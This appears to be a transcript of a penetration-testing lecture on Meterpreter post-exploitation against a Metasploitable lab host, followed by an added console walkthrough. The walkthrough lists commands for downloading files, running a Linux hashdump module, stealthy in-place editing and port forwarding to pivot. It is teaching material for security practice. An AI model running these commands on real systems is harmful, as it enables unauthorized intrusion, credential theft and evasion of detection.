So again, back to some file system commands. I can go to different directories, I can get my working directory, show files, make directories, move files around, remove directories. So most of your basic command shell functionality is enabled in Meterpreter itself.

I've also got networking commands. So even though I already know the interface information, I can certainly list it again, right? .129, that's my remote system, that's Metasploitable. Maybe I want to do something else. Maybe I want to run netstat to look at my ports that are listening, and maybe see some information about them; that's the -an option giving the same information. What's my routing table? What's in my ARP cache? Right now I've only been connected to from the Kali instance, which is .131. But if you were connecting to a system that was being used by lots of other people, just plain arp is very useful, because now I can see other systems that are connected, because their IP address and MAC address are saved in this cache. This is our ARP cache. I could look at route information. IPv6 information is also available if I was interested in that.
So being able to poke around in the file system is pretty handy. I can also do things like uploading and downloading files. So, for instance, if I want to download a file I have to have permission to read it. So if I do ls in my current directory, I can see that I've got some globally readable files, it looks like, so I can try to do something like download on one of them. And we can see that that actually worked. And if this is a certificate file (we'll get into some of these things later), then that could be really useful. Now, where does this file go? Switch to my other command shell, my Downloads directory... it's nowhere. Where might it have gone? So it did not go to my Downloads directory. It goes to whatever directory you launched your console from, and I was already in root when I did that. So I don't need this file; I'm gonna go ahead and delete it. Control-Page Up to switch back to my other tab. Remember your shortcuts.
So, uploading and downloading files. I can also edit a file. This is gonna be, uh, my certificate here; this is probably my public cert. So basically it throws you into, like, a vi, which is very handy, because you don't want to have to pull a file back, edit it, and push it back out. That increases the odds of getting detected, right? So we want to always think about taking the action that's required in the way that creates the minimum amount of noise.

So, other things to think about.
I'm in my shell, my Meterpreter shell. I also have the ability to run all kinds of post-exploitation modules by using the run command. There it is. So, executing a script, executing a post module. For instance, I might want to see if I can get hashdump from this system, even though I know the postgres password. That's not the administrator password; I might have to, you know, do some other work in order to be able to get the root password or some other valuable things.

Tab completion does not work in a context like this, unfortunately, so I have to know what I'm typing in, but I'm gonna try to run it. Actually, this is not a Windows system, so that won't work. Let me do this real quick: background this session, and do a search for "post", which is gonna give me a lot of information. I thought I might be able to find post modules for Linux. I scroll up here. Uh, looks like linux/gather/hashdump might be a good choice. Go ahead and copy that. It might have been faster to do a search for "hashdump" itself; that's a shorter list, and I know that's what I want to do. So now I can go through and find the one that I was interested in.

Okay, so now I'm gonna go back to session one, which is the one where my Meterpreter session is enabled, and what I can do is try to run this and see if it actually works.
Oh, see, it doesn't work. I have to be root in order for that, which makes sense. All right, so we're seeing some of the limitations of the kind of command shell that you have. I have a Meterpreter shell, which is useful, but it only lets me run commands that the postgres user account is authorized to run.

And this traces us back to the idea of the principle of least privilege, right? I don't want to run Postgres as root. If I did that, and I also did not change the password, or there was some other vulnerability, now when I get the application, or compromise the credentials rather, if the postgres ID has root-type privileges, now I can do other powerful things that I wouldn't be able to do otherwise. So there's good reason for respecting the principle of least privilege. You don't want to get generous with doling out privileges when you're building a system, for obvious reasons.

I also might want to, for instance, run a
command to see what processes are running on that remote system. So I just did a ps command, and it basically gives you full ps output. And this way I can tell with some detail what's actually running on that remote system: process ID numbers, parent process IDs, the name, and any paths that are relevant would all be shown here. I notice I've got a bunch of things running. I've got some applications: distccd, or rather distcc, the daemon for that. I've got an Apache web server running. Got some Ruby components running. And it looks like I've got VNC running. So there's a lot of clues I've just uncovered for how I might go about further compromising this system. And I haven't even done a scan yet. I just happened to take a guess that the postgres database would have a default password, and it does. So I'm able to get in and get all of this information.
Let's run our help command one more time. Other things we can do: I showed a few things, you know, like running a shell, the ps command. I can kill a process if I have permission to do so. I can execute commands. I can even set up port forwarding, which might be useful depending on your needs at the time. And there are some other options I'm, uh, looking at, for things like encoding and setting timeouts. There are ways to try to get a picture from the webcam; I don't see that option in this context. But other things to think about: I can suspend a process. I can also run a sysinfo command to give me a concise output, kind of like a uname -a command would do on a UNIX system. Give me some good details here for what I would be tracking, other details I want to track for this remote system, to know that I've got something truly useful.

All right, so we'll definitely explore more features of the Meterpreter shell as we go through some of the demonstrations, but this is a good introduction. Alright, see you in the next video.
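The session walk described in this video, written out as an added example (this is not a listing from the video or from the Metasploit project; it is a reconstruction of the command sequence). Only real msfconsole and Meterpreter commands are used. The session number (1), the remote host 192.0.2.129, the file path /var/lib/postgresql/server.crt and the local directory /root/loot are assumed placeholders, and lines beginning with `#` are annotations, not input:

```console
# --- inside the Meterpreter session obtained via the postgres default password ---
meterpreter > getuid                       # who am I on the target? (expect: postgres)
meterpreter > sysinfo                      # concise host info, like uname -a
meterpreter > pwd                          # remote working directory
meterpreter > ls                           # look for globally readable files

# Network recon from inside the box, no scan needed
meterpreter > ifconfig
meterpreter > netstat                      # listening ports on the target
meterpreter > arp                          # who else talks to this host (IP <-> MAC)
meterpreter > route

# Downloads land in the LOCAL working directory, not ~/Downloads.
# Check it first, and move it if you want the loot somewhere specific.
meterpreter > lpwd                         # e.g. /root  (the dir msfconsole was started from)
meterpreter > lcd /root/loot               # assumed local directory, created beforehand
meterpreter > download /var/lib/postgresql/server.crt   # assumed path; needs read permission

# Edit in place instead of download -> modify -> upload (less traffic, fewer artifacts)
meterpreter > edit /var/lib/postgresql/server.crt

# Process listing: distccd, apache, ruby, VNC etc. are the clues for the next step
meterpreter > ps

# Post module: this needs root, so it fails as postgres. Verify with getuid first
# rather than guessing. No tab completion here; type the full module path.
meterpreter > run post/linux/gather/hashdump

# --- back in msfconsole: find the module instead of guessing its name ---
meterpreter > background
msf6 > search hashdump                     # shorter list than "search post"
msf6 > sessions -l                         # confirm the session id
msf6 > sessions -i 1

# Pivot toward a service you saw in ps: forward local 5901 to VNC on the target
meterpreter > portfwd add -l 5901 -p 5900 -r 192.0.2.129
meterpreter > portfwd list
```

The `getuid` check before `run post/linux/gather/hashdump` is the practical takeaway from the least-privilege discussion: the module reads /etc/shadow, so it succeeds only if the service account you came in as was (wrongly) given root, and a failure there tells you that privilege escalation is the next job, not that the module is broken.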